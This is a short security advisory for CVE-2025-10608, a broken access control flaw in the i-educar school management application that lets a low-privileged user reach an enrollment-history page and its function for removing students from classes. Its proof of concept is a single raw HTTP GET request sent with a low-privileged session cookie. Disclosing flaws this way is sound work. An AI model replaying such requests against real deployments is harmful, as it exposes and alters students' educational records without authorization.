
CVE-2025-10608: Broken Access Control in /enrollment-history/[ID] Endpoint

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-10608

Summary

A Broken Access Control vulnerability was identified in the /enrollment-history/[ID] endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.

Details

Vulnerable Endpoint: GET /enrollment-history/[ID]
Authentication: Required

The application does not validate the caller's permissions before serving this endpoint, so even a low-privileged user can reach functionality that their role is not supposed to have. A quick way to confirm this during testing is to replay the same request with a session for an account that does hold the permission and one that does not, then compare the responses: if both receive the full page instead of a 403 or a redirect, the server-side authorization check is missing.

PoC

  • Authenticate as a non-privileged user.

  • Send the following request:

GET /enrollment-history/206 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Referer: http://localhost/intranet/educar_matricula_det.php?cod_matricula=206
Cookie: i_educar_session=[low_privileged cookie]
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

  • With the low-privileged session we still get the page and its function to sign students out of classes, which this user should not be allowed to do. Note that the ID in the path (206) is the same enrollment identifier (cod_matricula=206) that appears in the Referer, so the endpoint is reached directly from the enrollment detail page with no further check.

Impact

Broken Access Control vulnerabilities can have severe consequences, including:

  • Unauthorized access to restricted functionality;
  • Escalation of privileges for low-level users;
  • Exposure of sensitive data and potential system compromise;
  • Loss of confidentiality and integrity of educational records;
  • Reputational damage to the organization.

Reference

https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10608.md

Finder

Marcelo Queiroz

By: CVE-Hunters
